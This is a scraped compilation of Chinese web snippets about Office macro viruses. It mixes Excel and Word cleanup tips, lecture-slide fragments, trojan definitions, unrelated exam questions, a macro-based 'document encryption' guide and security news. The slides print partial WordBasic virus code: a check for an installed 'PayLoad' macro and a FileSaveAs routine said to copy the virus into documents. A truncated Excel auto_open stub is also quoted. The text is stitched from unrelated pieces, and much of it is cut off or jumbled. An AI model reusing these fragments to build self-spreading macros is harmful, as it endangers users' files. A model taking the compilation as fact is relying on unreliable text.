疑是宏病毒

合集下载

完美解决excelVBA宏病毒

完美解决excelVBA宏病毒

完美解决excelVBA宏病毒打开EXCEL文档,提示EXCEL VBA中包含无法禁用的宏(excel4.0的),禁用宏则文档为空什么都不显示;发邮件提示有病毒文件发送不成功;在打开EXCEL文件时,自动新建无数个EXCEL文件。

如有上述情况,可能中了VBA宏病毒,请用下列方式进行处理:1、格式-工作表—取消隐藏,会多出来一个“00000PPY”的工作表,请把该隐藏的工作表删除。

如取消隐藏为灰色,则文件没中该病毒EXCEL 2007操作方法为:选中某一工作表后右键—取消隐藏2、插入-名称-定义,把所有的多余的名称定义删除。

EXCEL 2007操作方法为:公式—名称管理器此时该文件的病毒已删除。

但如果新建EXCEL文件,则还会中该病毒,请执行第三步。

3、打开ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件,执行1、2步。

(BOOK1文件为无扩展名,请用右键-打开方式-选择EXCEL打开)4、找到ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件,右键—属性—-只读打勾—确定。

由于EXCEL每次启动时自动打开ProgramFiles\MicrosoftOffice\OFFICE11\XLSTART下的book1文件,经过第3、4步处理后,不会在本机上再传播此病毒,但已感染的文件必须逐一进行第1步和第2步处理。

该病毒目前传播已十分广泛,360 金山瑞星等杀毒软件都查不到毒,卡巴能查到但会把文件一次性删除得不偿失。

由于该病毒在EXCEL文件中存在,除非把EXCEL文件全部删除否则重装系统不能解决该问题。

该病毒不会在EXCEL 2007传播,但把文件传给他人仍然会传播该病毒。

该病毒十分讨厌,给工作造成了诸多不便,但有点象恶作剧,对计算机和文件没有实质性破坏。

但邮件发不出去,一打开EXCEL文件就新建几百个EXCEL文件,实在是可恶到人受不了,毕竟工作离不开EXCEL。

宏病毒

宏病毒

Office 2K, Outlook 2K, FrontPage 2K Office XP, Outlook 2002, Word 2002, Access 2002, FrontPage 2002
VBA 6.0
VBA 6.3
计算机病毒及其防范技术
• 使用VBA可以实现的功能包括:
– – – – (1)使重复的任务自动化 (2)自定义Word工具栏、菜单和界面 (3)简化模板的使用 ()自定义Word,使其成为开发平台
计算机病毒及其防范技术
– – – – – – – –
'检查正常的宏 End If If MacroName$(i, 0, 0) = "FileSaveAs" Then bTooMuchTrouble = - 1 '但如果FILESAVEAS 宏存在那么传染比较困难. End If Next i If Not bInstalled And Not bTooMuchTrouble Then
计算机病毒及其防范技术
宏病毒关键技术
• (1)自动执行的示例代码:
– – – – – – – Sub MAIN On Error Goto Abort iMacroCount = CountMacros(0, 0) '检查是否感染该文档文件 For i = 1 To iMacroCount If MacroName$(i, 0, 0) = "PayLoad" Then bInstalled = - 1
计算机病毒及其防范技术
• (2) SaveAs 程序:
– 这是一个当使用FILE/SAVE AS功能时,拷贝宏病 毒到活动文本的程序。它使用了许多类似于 AutoExec程序的技巧。尽管示例代码短小,但足以 制作一个小巧的宏病毒。 – Sub MAIN – Dim dlg As FileSaveAs – GetCurValues dlg – Dialog dlg

宏病毒

宏病毒

宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。

从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。

并且会驻留在Normal面板上6,宏病毒在.DOC文档、.DOT模板中是以BFF(BinaryFileFormat)格式存放,这是一种加密压缩格式,每种Word版本格式可能不兼容。

木马病毒“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。

植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服务端的电脑。

运行了木马程序的服务端以后,会产生一个有着容易迷惑用户的名称的进程,暗中打开端口,向指定地点发送数据(如网络游戏的密码,即时通信软件密码和用户上网密码等),黑客甚至可以利用这些打开的端口进入电脑系统。

特洛伊木马程序不能自动操作,特洛伊木马有两种,universal的和transitive的,universal就是可以控制的,而transitive是不能控制,刻死的操作。

危害58 ASCII码采用____C__位二进制编码。

A、6B、7 C 8 D 9139 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。

多选题5、常见的信息采集工具有哪些扫描仪:(纸制材料扫描成图片,利用OCR软件识别为文字)照相机:主要用于采集图像信息;摄像机:主要用于采集视频信息;录音设备:主要用于采集音频信息(麦克风、录音笔、Mp3);计算机:采集来自光盘网络等多种类型的信息至计算机中10如何缩小搜索范围A搜索关键词提练B细化搜索条件C用好逻辑命令D搜索逻辑命令通常是指布尔命令“AND”、“OR”、“NOT”及与之对应的“+”、“-”等逻辑符号命令。

浅析Word文档宏病毒的识别及防治办法

浅析Word文档宏病毒的识别及防治办法

浅析Word文档宏病毒的识别及防治办法摘要:本文从多个方面描述了发现宏病毒的方法及解决方案,目的在于使得大家了解宏病毒,避免被宏病毒侵入,造成计算机数据文件的丢失。

关键词:Word宏病毒清除目前,Microsoft Office几乎已经成为最大众化的办公文档,Word 文档更是目前办公数据交流和传送的最常用的方式。

无数的.DOC文件从上级机关下达到基层,基层又上报到上级机关,或再传发到私人的电脑里。

与此同时,计算机系统在传播和复制数据的过程中,可能携带着宏病毒。

这种病毒能跨越多种平台,并且针对数据文档进行破坏,危害性极大。

一般情况下,人们大多注意可执行文件(.Com、.Exe)的病毒感染情况。

而Word宏病毒寄生于Word文档中,并且人们一般都要对文档文件进行备份,因此病毒可以隐藏很长一段时间。

所以,宏病毒的危害很大且难以防治。

1 Word宏病毒揭密Microsoft Word中对宏定义为:“宏是能组织到一起作为一独立命令使用的一系列Word指令,它能使日常工作变得更容易。

”但是一些制作病毒的专业人员利用Microsoft Word的开放性即Word中提供的Word Basic编程接口,利用一些数据吃力系统内置命令编程语言的特性而形成的一中病毒。

这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取某种控制权,达到传染的目的。

目前在可被宏病毒感染的系统中,以微软的Word、Excel居多。

2 宏病毒的特点2.1 传播速度极快Word 宏病毒通过DOC文档和DOT模板先进行自我复制,然后进行传播,而Word文档恰恰是交流最广的文件类型。

多年来,人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染,而对外来的文档文件基本上是直接浏览使用,这就给Word宏病毒传播带来很多便利。

excel宏病毒解决方法

excel宏病毒解决方法
打开“C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART”和“C:\Program Files\Microsoft Office\OFFICE11\XLSTART”文件夹,把里面的book1删除。然后再新建一个文档,把它重命名为“book1”(注:这是不带.txt后缀名的文件,要修改成不带后缀名的book1,首先要把文件的后缀名显示出来,方法是:点击文件夹菜单栏上的[工具]-[文件夹选项]-[查看]中找到“隐藏书籍文件类型的扩展名前的勾去掉”。这样当你再次打开excel文档的时候就不会自动打开book1文档了
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ =
Workbooks(n$).Close (False)
系统提示
所中病毒:startup.xls宏病毒
解决方法:
1.手工清除
A、 搜索“startup.xls”文件, 搜索到后,直接删除,如不能删除的,那就在安全模式下删除;
B.打开注册表,搜索“startup.xls”,搜索到后,直接删除;
经过本人2012年1月5日测试,只要删除book1就可以了。哈哈。解决了。
另外20120305发现一个新的宏病毒问题,之前没有遇到
现象:只要打开EXCEL文档时,系统就弹出“系统内存不能为 'write' or 'read'”或者 编辑xls文件后,保存的数据无效,或者次次打开文件提示是否需要开启宏,你打开一个新的xls文件,发现宏里面有几个宏在准备启动中,只要你在弹出窗口中选择启动宏.则会启动了病毒!

感染宏病毒解决处理办法

感染宏病毒解决处理办法

最近word文档感染宏病毒解决处理办法:
一、首先要清除掉word模版,Word模板路径在哪里呢?
1、在Windows XP系统中,“我的模板”所在文件夹目录为C:\Documents and
Settings\Administrator\Application Data\Microsoft\Templates;
2、而在Windows Vista或Windows7\windows10系统中,“我的模板”文件夹目录为
Users\Administrator\AppData\Roaming\Microsoft\Templates。

3、特别注意:word2003模版文件名是:normal.dot , word2007\2010\2016等
的模版文件名是:normal.dotm
4、如果以上目录找不到可能是你电脑隐藏了目录,请在此设置处打开
二、其次是将电脑系统中360杀毒升级到最新版,再进行全盘杀毒。

亲们不要
用金山毒霸杀毒,这个软件不大管用。

【下载本
文档,可以自由复制内容或自由编辑修改内容,更多精彩文章,期待你的好评和关注,我将一如既往为您服务】。

计算机病毒——宏病毒

计算机病毒——宏病毒
讲解人:王宏伟 制作人:肖丞昊 收集资料:杜文轩、孙雷、刘小育
从广义上讲,凡是能够引起计算机故障,破坏计算机数据的程序 统称为“计算机病毒”。据此定义,诸如蠕虫、木马、恶意软件 此类程序等均可称为“计算机病毒”。 计算机病毒特性:破坏性、隐蔽性、传染性、潜伏性。 “计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者 毁坏数据,影响计算机使用,并能自我传染的一组计算机指令或者程序 代码。”
(Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 )
病毒命名的一般格式为:
1、系统病毒:Win32、PE、Win95等;
< 前缀 > .< 病毒名 > .< 后缀 >
(感染Windows系统的.exe、.dll 等文件,并利用这些文件进行传播) 2、蠕虫病毒:Worm; (通过网络攻击或者系统漏洞进行传播,往往还发送带毒邮件,阻塞网络)
—《中华人民共和国计算机信息系统安全保护条例》第二十八条 (1994年2月18日中华人民共和国国务内 存
病 毒 引 导 模 块 被 执 行
修 改 系 统 参 数 , 引 入 传 染 和 表 现 模 块
进行 传染
进行 表现
监 视 系 统 运 行
采用映像劫持技术,使多种杀毒软件和安全工具无法使用 ;
记录用户的键盘、鼠标操作,窃取银行卡、网游密码等信息 ; 记录用户的摄像头操作,可以从远程窥探隐私 ;
使用户的机器运行变慢,大量消耗系统资源 ;
窃取用户电脑数据、信息; ……
混合式威胁已成主流,基于漏洞的攻击防不胜防 传播方式尽其所能,网页与U盘成为重要途径 自我防御能力增强 团队化特征明显
(2)禁止自动执行宏功能 (winword.exe/mDisableAutoMacros); 处理: (1)应急时可以用写字板或WORD 6.0将文档打开并另 外存储。

word出现宏病毒安全警告怎么办.doc

word出现宏病毒安全警告怎么办.doc

word出现宏病毒安全警告怎么办方法/步骤1、在word文档中用宏进行保护文件并不复杂。

在菜单栏的上面找到工具选项,并找到在下拉菜单底部位置的宏选项。

2、单击第三个选项中的宏安全性,打开宏设置界面,进行宏相关设置的编辑。

3、这样就完成了宏安全性的查看。

但是不是要说宏如何加密吗?下面就来讲解宏怎样加密文档。

4、返回刚才的菜单中,找到宏选项,并且单击进入宏指令编辑模式。

5、在下拉选框中输入宏的名称,在宏的位置找到所有的活动文档,并且选择创建,就可以完成宏的创建。

但是这还没完,还要编辑宏。

6、在打开的代码编辑界面中,在end sub的上面插入索要加密的指令代码,让宏在word运行时执行这些代码,起到保护作用。

7、在网上可以找到一些可用的加密代码,因为比较复杂这里就不做说明。

英文点号可以起到快捷输入的作用。

在end sub之后写代码是没有用处的。

8、输入完成后,在左上角找到保存normal菜单项,就可以对word文档进行加密啦!9、千万不要忘记密码,也就是代码快结束时Password = xxxx部分,这非常重要哦!10、加密完成的效果就是这样。

是不是很有效果并且很有成就感呢?相关阅读:1月,英特尔处理器中曝Meltdown(熔断)和Spectre (幽灵)两大新型漏洞,包括AMD、ARM、英特尔系统和处理器在内,几乎近发售的所有设备都受到影响,受影响的设备包括手机、电脑、服务器以及云计算产品。

这些漏洞允许恶意程序从其它程序的内存空间中窃取信息,这意味着包括密码、帐户信息、加密密钥乃至其它一切在理论上可存储于内存中的信息均可能因此外泄。

二、GitHub 遭遇大规模Memcached DDoS 攻击2月,知名代码托管网站GitHub 遭遇史上大规模Memcached DDoS 攻击,流量峰值高达1.35 Tbps。

然而,事情才过去五天,DDoS攻击再次刷新纪录,美国一家服务提供商遭遇DDoS 攻击的峰值创新高,达到1.7 Tbps!攻击者利用暴露在网上的Memcached 服务器进行攻击。

宏病毒的查杀与防治

宏病毒的查杀与防治

14
宏病毒的查杀及预防
1、提高对宏病毒的警惕性 在office办公软件当中,在 工具—宏—安全性 选项当中把宏安全性设置为 高。 2、时刻保持杀毒软件的正常运行 把杀毒软件的更新设置为自动更新,打开杀毒软 件所有的杀毒选项 3、不要随意打开不明电子邮件 宏病毒寄存在文档当中,通过邮件及U盘拷贝等形 式传播。在收到不明来历的电子邮件,马上删除。例 如:邮件标题为人才调查、人才招聘、财务报表、公 司计划等不明来历具有诱惑性的邮件
宏病毒的查杀及预防151提高对宏病毒的警惕性在office办公软件当中在工具宏安全性选项当中把宏安全性设置为2时刻保持杀毒软件的正常运行把杀毒软件的更新设置为自动更新打开杀毒软件所有的杀毒选项3不要随意打开不明电子邮件宏病毒寄存在文档当中通过邮件及u盘拷贝等形式传播
宏病毒识别与防治
网络管理中心 二〇一二年十月
7
宏病毒的识别

3、如果杀毒软件中关于宏病毒防护选项启用后,不能在下次开 机时依然保存。 OFFICE中提供了对宏病毒的防护功能,它可以在 “工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE 中提供的宏警告功能,它在感染系统后,会在每次退出 OFFICE时 自动屏蔽掉宏病毒防护选项。因此一旦发现机器中设置的宏病毒防 护功能选项无法在两次启动WORD之间保持有效,则系统已经感染 了宏病毒。也就是说一系列WORD模板、特别是office目录下的 normal.dot 已经被感染。
5
宏病毒的概念

宏病毒的起源
宏病毒在上个世纪90年代得益于网络及电子邮件 的发展而广泛传播。宏病毒主要感染文件有 word、 Excel 的文档。并且会驻留在系统内存上。因为这种 病毒活动特征区别于电脑病毒,所以一般的杀毒软件 不会报警。只有在用户打开及保存以上两种文档时感 染文件。

宏病毒的名词解释

宏病毒的名词解释

宏病毒的名词解释宏病毒,即宏命令病毒,是一种针对办公软件和应用程序的恶意软件。

它利用了宏语言的功能,通过嵌入恶意代码来感染和破坏文件。

宏病毒的破坏性广泛存在于Word、Excel等办公软件中,曾经对计算机安全构成严重威胁。

一、宏病毒的传播方式宏病毒多以邮件附件的形式传播。

黑客通过电子邮件发送带有嵌入宏病毒的文档,一旦用户点击或打开,宏病毒就开始在用户计算机上执行恶意操作。

宏病毒还可以通过文件共享、网络下载和可移动存储介质等方式传播。

二、宏病毒的感染和破坏宏病毒主要感染和破坏办公文档文件,如Word、Excel、PowerPoint等。

它利用文档应用程序内置的宏语言功能,如VBA(Visual Basic for Applications),使恶意代码得以在打开文档的同时运行。

宏病毒可以操纵整个文档,执行恶意操作,如删除、篡改内容、复制自身并传播到其他文档。

宏病毒的破坏性可分为明显和隐蔽两种形式。

明显的病毒会立即显示出破坏行为,如删除文件、关闭程序等。

而隐蔽的病毒则更加隐蔽,它会在后台默默地进行操作,窃取用户信息、传播到其他文档或网络上。

三、预防宏病毒的措施为了保护计算机和个人信息的安全,我们需要采取一系列预防措施来防止宏病毒的感染和破坏。

1. 注意邮件和文件来源:不打开来自陌生人或不可信来源的邮件和文件,尤其是带有宏功能的文档。

2. 更新安全软件:定期更新防病毒软件和操作系统,以获取最新的病毒定义和安全补丁。

3. 禁用宏:对于非必要的宏功能,建议禁用或设置为仅在受信任的文件中启用。

4. 建立安全意识:提高员工对宏病毒的认知,教育他们不轻易点击或打开可疑附件,注意安全使用办公软件。

5. 备份重要文件:定期备份关键文件,以防止突发病毒感染或数据丢失。

四、应对宏病毒的解决方法如果不幸遭受宏病毒感染,我们需要及时采取相应的解决方法来处理病毒。

1. 断开网络连接:迅速断开计算机与网络的连接,以防止病毒通过网络传播和进一步破坏。

Excel宏病毒的应对方法

Excel宏病毒的应对方法

Excel宏病毒的应对方法
电脑中了Excel宏病毒,很多Excel文档无法打开或无法正常找开,上网查询后下载专杀毒软件杀毒后发现宏病毒已经清除,重启后病毒还在。

经过试验处理了几台中毒的电脑,总结方法如下以供参考。

1、最简单的方法
第一步进入删除Office 应用程序控制面板---添加或删除程序
----Microsoft Office Professional Edition 2003—----删除
第二步安装Office软件下载简化版或完全版安装到电脑中即可
第三步关闭网络拔掉网络线或进入“网上领居”属性----“本地连接”----停用
第四步打开中毒的Excel文件在弹出对话框中选择“禁用宏”,然后全选内容-----复制,新建文件----粘贴(刚才所复制的内容)-----保存文件。

第五步重复第四步完成所有打不开的Excel文件的处理工作
第六步重开网络插入网络线或进入“网上领居”属性----“本地连接”----启用
完成
2、重装系统方法安装好系统和office 软件,执行第一种方法中的第二步至第六步即可
所有的事后处理都是亡羊补牢,我们应该平时养成防范意识,安装杀毒软件并经常更新和检查磁盘,对来历不明的U盘和光碟要慎用,特别不要关闭防火墙等杀毒软件给病毒入侵有可乘之机,让自己的电脑安全正常工作。

关于宏病毒的判断、清除和预防

关于宏病毒的判断、清除和预防

关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。

因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。

没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。

对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。

此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。

一定要将打开的文件作好备份再进行杀毒。

我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。

只有360查了出来并将病毒清除。

注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。

这样就能保证文件内容不会丢失了。

excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。

令人心烦的excel宏病毒终于清除了

令人心烦的excel宏病毒终于清除了

令人心烦的excel宏病毒终于清除了!我如释重负地吁了口气,脑子一下子轻松了许多。

你可能不知道,为了清除这个excel宏病毒,几天来,搞得我头昏脑胀。

大约两三个星期前,同事罗某告诉我,下面报上来的excel表,打开后出现了奇怪的现象:会自动打开一个book1的电子表格。

他让我帮忙解决一下。

我初步判断是宏病毒,默认打开的book1可能是excel的模板。

我先“另存为”文件,找到book1的位置,删掉。

同时把excel的宏安全性设置为高,禁止运行来历不明的宏,问题即解决了。

恰巧到下面去检查工作,某单位反映,电脑中病毒了,所以没有及时交表格。

一问情况,与罗某讲的情况一样。

我主动表示去“搞搞看”。

但是情况并非如我猜想的那样。

情况是:如果将宏的安全性设为非常高,禁用宏,会弹出一个警告:“出现了一个不能被禁止、又无法签署的Microsoft Excel 4.0 宏”,该表打不开;如果要打开这个表,必须降低excel宏安全性等级,将它设为中或低,即运行宏病毒,但又多出了一个book1表。

即使将book1删除,仍然不行。

面对这个新病毒,当时我不知该怎么办。

没过两天,罗某又来找我,说又出现了一种现象。

我去看了,正与上次在下面检查时看到了excel 4.0 宏病毒一模一样。

而且,下面有几个单位都说出现了宏病毒,上报来的表格中都有上面讲的问题。

而且办公室有三台电脑都感染了excel 4.0 宏病毒。

这么多的电脑感染了,引起了我的兴趣。

以前,我的电脑也多次中过病毒。

我一般的做法就是上网查找资料,把几篇文章介绍的方法结合起来,多试几次,几乎都能解决。

可是这一次,情况完全不同。

上网查了多次,讲宏病毒的文章特别多,但是介绍杀除方法的极少,而专门针对Microsoft Excel 4.0 宏病毒的只有一两篇提问的贴子,所介绍的方法就两样,一是在Excel 2003中禁止宏,二是用杀毒软件。

第一种禁止是不行的,第二种杀毒软件我用了小红伞、360安全卫士,没查出病毒。

遇到宏病毒怎么办

遇到宏病毒怎么办

遭遇Word宏病毒怎么办word好用,宏病毒可怕,笔者在多次遭遇word宏病毒之后,终于摸索出一个自力更生,手工解决word宏病毒的简单、应急方法,成功率100%(适用于Word97、Word2000)。

一、常见现象描述现象1:使用word过程中,在进行打开、保存或关闭文档操作时,提示诸如“对象不存在”.之类的错误信息(这是宏病毒没编好,造成的执行错误),并出现一个调试窗口,可以看到一行行代码(这些代码就是宏病毒的“身体”——VBA语言编写)导致正常的文档编辑工作无法进行,文档无法保存。

…现象2:进行正常操作时,忽然出现各种莫名其妙的对话窗口,比如,突然蹦出个对话框,提示让你输入一句话,还常带有一些俏皮话。

现象3:没有进行任何关闭操作的前提下,正在编辑的文档自动关闭,或者word自动关闭。

现象4:正常使用word时,常常突然出现提示Word非法操作,文档来不及保存。

二、检查宏病毒当怀疑有宏病毒时,可以通过以下方法确认宏病毒的存在:方法1:选择[工具]/[宏]/[宏],如果出现对话框,对话框中有诸如AutoOpen、Autoclose、DocumentOpen、Documentsave、DocumentClose之类的宏名,无法确认其来源,可以认为是宏病毒。

方法2:选择[工具]/[宏]/[宏]、[录制新宏]、[visual Basic编辑器]菜单项,如果没有任何反应,可以确认宏病毒存在;同样,选择[选项]菜单项,[选项]对话框并不出现,可以确认宏病毒。

方法3,:打开[工具]菜单,发现其中的[宏]和[选项]菜单项“消失”了,而且没有人为的自定义过菜单,这就应该是宏病毒为保护自己不被发现、不被预防而设置的障碍。

三、解决办法应该相信,一切word宏病毒都是纸老虎。

这是因为:1.宏病毒用解释性语言VBA编写,需要word对宏病毒解释,宏病毒才能运行;2.宏病毒的自我复制,需要利用Word的通用模板文件(NOM6JLL.DOT)作为中介;3.word本身有预防宏病毒的功能。

宏病毒电脑病毒传染介绍

宏病毒电脑病毒传染介绍

宏病毒电脑病毒传染介绍

用户一旦下载打开这类文档,宏病毒会趁机入侵到电脑上,在用户不知情的情况下运
行恶意程序,对电脑造成严重损害。

不过,腾讯电脑管家已经能完美应对此类风险,确保
用户电脑安全。

宏病毒是一种寄存在文档或模板的宏中的计算机病毒:
其利用了用户对于word、excel等文件防备心差的心理,主要通过邮件附件进行传播。

用户一旦下载、打开这类含有宏病毒代码的文档,电脑会提示用户将“禁用”的宏设置打
开之后才能开到文档内容会提示“Macros must be enabled to display the contents
of the document”,如下图。

而用户一旦打开宏设置,则该文档所包含的宏病毒代码即
可执行,进而危害用户电脑
宏病毒电脑病毒传染特点:
腾讯反病毒实验室专家强调,由于word、excel等文件的拷贝、传播速度快,会导致
所包含的宏病毒大面积、快速的传播。

专家建议广大用户,不要轻易打开不明来源、邮件附件中不明内容的office文档,
并禁用office中的宏设置,这样可以避免恶意宏代码在打开文档时自动执行,下载并安
装腾讯电脑管家可以有效保障用户电脑安全。

感谢您的阅读,祝您生活愉快。

EXCEL宏病毒处理方法

EXCEL宏病毒处理方法

Excel宏病毒(BOOK1病毒)处理方法症状:第一次打开带病毒的EXCEL文档时,会提示“是否启用宏”对话框,以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。

传播途径:主要以发送邮件或使用U盘时,接收了带病毒的EXCEL 文档。

处理步骤:1、首先进行病毒查杀:使用360杀毒软件或瑞星杀毒软件查杀;2然后将病毒源进删除:在C:\Program Files\Microsoft Office\OFFICE11\xlstart\下,然后将book1文件删除。

查毒方式:主要有360杀毒软件和瑞星杀毒软件两种,这里详细介绍瑞星杀毒软件的安装和使用方法。

1、360杀毒软件:直接在360官方网站进行下载;2、瑞星杀毒软件安装及进行查杀的步骤(1)、下载首先用户需要在IE地址栏输入地址:http://192.168.10.5/rav打开杀毒软件下载界面点击“立即下载”进行软件下载,如下图:(2)双击进行下载后的文件:(3)此时将出现安装界面,如下图:(4)点击第二项“安装瑞星杀毒软件客户端”此时将出现最用用户许可协议,点击“我接受”,如下图:(5)此时将出现选择需要安装的组件的界面,点击下一步即可,如图:(6)此时将出现网络参数设置,填写系统中心IP地址192.168.10.5,此步非常重要,系统中心IP地址填写错误将不能升级杀毒软件,如下图:(7)此时将出现选择安装路径的界面,一般用默认目录即可,点击下一步进行程序的安装,如下图:(8)按界面提示下一步,直至安装结束。

重新启动机器,查看病毒库是否是升级到最新版本。

(9)对该软件进行配置,选择“杀毒—查杀目标”,将所有盘符选定。

(10)、选择“杀毒—清除病毒”。

在发现病毒时,选择所需的处理方式。

①询问我:是查处病毒后进行提示,选择如何处理查出的病毒。

②清除病毒:是查出病毒后,不询问,直接清除文件中的病毒。

③删除染毒文件:是直接将感染病毒文件删除。

(11)、选择“开始查杀”。

三招防范宏病毒

三招防范宏病毒

三招防范宏病毒由于宏病毒经常在办公软件Office中出现,给广大用户造成不小的损失。

笔者发现,通过以下三招可以远离宏病毒(以Word为例)。

第一招:设置宏安全级别打开Word,选择“工具选项安全性宏安全性”命令,这样就打开了宏的安全级别属性设置选项,将安全级别由默认的“高”修改为“非常高”,最后单击“确定”即可。

这样可以防止除Word默认的宏以外的其他宏运行。

第二招:运行宏病毒自动提示打开Word,选择“工具选项安全性宏安全性”命令,单击“可靠发行商”标签,取消选择“信任所有安装的加载项和模板”复选框,然后单击“确定”即可。

这样当打开含有宏的Word文档时,就会提示宏已被禁止。

当然,也可能让正常的宏使用受到限制。

第三招:卸载VBA彻底预防宏病毒VBA全称是Visual Basic for Application,它是Microsoft Visual Basic的宏语言版本。

用于Windows应用程序的宏。

是Word中宏的支持工具包,一旦禁用此包,一些自定义模板和所有的宏将不可用。

具体方法:双击“控制面板”中的“添加/删除程序”图标,找到Microsoft Office的安装项,单击“更改”按钮,选择“添加或删除功能”选项后,单击“下一步”按钮,在弹出来的窗口选“选择应用程序的高级自定义”复选框,再单击“下一步”按钮,这样,就可以选择删除该工具包。

在打开的Office程序及附加内容和工具中单击“Office共享功能“前的加号,找到“Visual Basic for Application”,单击前面的驱动器图标,选择“不安装”按钮即可。

经过以上三招,宏病毒将会远离你的Office了,这里是以Word为例介绍的,其实对Excel 也同样适用,不妨一试。

、只要运行注册表就可以啦!具体做法:在“开始”里找到“运行”按纽,点击后在“打开”栏里输入“regedit”,就可以打开注册表了;找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office 打开,找11.0打开,找EXCEL打开,找security打开后看到它旁边的窗口有一项名称为LEVEL 的,双击它,在跳出的编辑DWORD值里面看到数值数据(V):下面的空格啦,你就可以在里面修改数值啦。

宏病毒分析

宏病毒分析

宏病毒的原理
Word、Excel居多,较为相似 ������ 病毒进入word,代替正常宏 FileOpen、FileSave、FileSaveAs、FilePrint ������ 获得对文件交换的控制 ������ 当某项功能被调用时,相应的病毒宏会篡夺 控 制权,实施非法操作,包括传染操作、表现操
把文档转换成模版格式 ������ 把所有宏病毒复制到该文档 ������ 被转换成模版格式后的染毒文件无法转存 为 其他格式 ������ 含有自动宏的宏病毒被其他计算机的word 打 开的时候会自动感染该计算机 ������ 将感染每一个被打开的word文档 ������ 另外创建的新文档同样含有宏病毒
宏病毒的特征和行为


与操作系统病毒相似,宏病毒在感染时 增加了文件的大小。 如果你知道文档上一次被修改的大约时 间,你可以检查该文档的时间戳,看这 个文档最后一次被修改的时间。如果时 间戳比你记忆中的修改时间靠后,就可 能存在着病毒。
宏病毒感染的几种症状

在以前不含有宏的文件中出现了宏。 ������ 该应用程序将所有文件保存为模板。 ������ 该应用程序经常会提醒用户保存那 些 只是被查看了但没有被修改的文件。
宏病毒的原理
宏病毒的产生是利用了一些数据处理系统内置宏命令编 程语言的特性而形成的。这些数据处理系统内置宏编成 语言的存在使得宏病毒有可乘之机,病毒可以把特定的 宏命令代码附加在制定文件上,通过文件的打开或关闭 来获得控制权,实现宏命令在不同文件之间的共享和传 递,在未经使用者许可的情况下获取某种控制权,达到 传染的目的。

宏病毒的破坏表现



对用户进行骚扰 一种宏病毒在每月13日发作显示出5个数 字连乘的心算数学题 有些病毒使文档打印时出现乱码 有些病毒删除帮助文件或删除硬盘所有 文件 对word、excel运行的破坏 对系统的破坏,basic能够调用系统命令

计算机宏病毒判断方法

计算机宏病毒判断方法

计算机宏病毒判断方法
工具/原料
宏病毒
office
方法/步骤
宏病毒的破坏性较大,具有一定的隐藏性,采用常规的病毒判定方法,不能判断宏病毒的存在、
